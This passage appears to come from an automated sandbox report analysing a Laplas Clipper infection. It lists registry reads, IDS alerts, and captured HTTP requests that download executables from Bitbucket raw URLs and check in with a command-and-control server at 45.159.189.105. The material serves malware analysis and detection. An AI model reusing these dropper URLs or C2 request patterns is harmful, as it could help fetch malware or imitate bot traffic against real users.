                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose,35_2_00C0A1F1
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59BE3C FindFirstFileExW,39_2_000002505E59BE3C
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BBE3C FindFirstFileExW,41_2_000001C08C1BBE3C
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118BE3C FindFirstFileExW,42_2_000002131118BE3C
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64BE3C FindFirstFileExW,43_2_00000225DC64BE3C
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeCode function: 4x nop then push rbx7_2_00007FF7D3B99F43

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:49739 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:49740 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:50007 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:50008 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 185.166.143.49:443
                        Potential dropper URLs found in powershell memory
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmpString found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmpString found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: global trafficHTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 45.159.189.105 45.159.189.105
                        Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                        Source: Joe Sandbox ViewASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS
                        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50007 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50008 -> 45.159.189.105:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 185.166.143.49:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 185.166.143.49:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.159.189.105
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.105/
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.105/bot/online?guid=724471
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001165000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000110D000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.105/bot/regex
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.105/bot/regexystem32
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                        Source: powershell.exe, 00000028.00000002.2588137251.000001C536E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                        Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: lsass.exe, 0000002C.00000002.2966233534.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
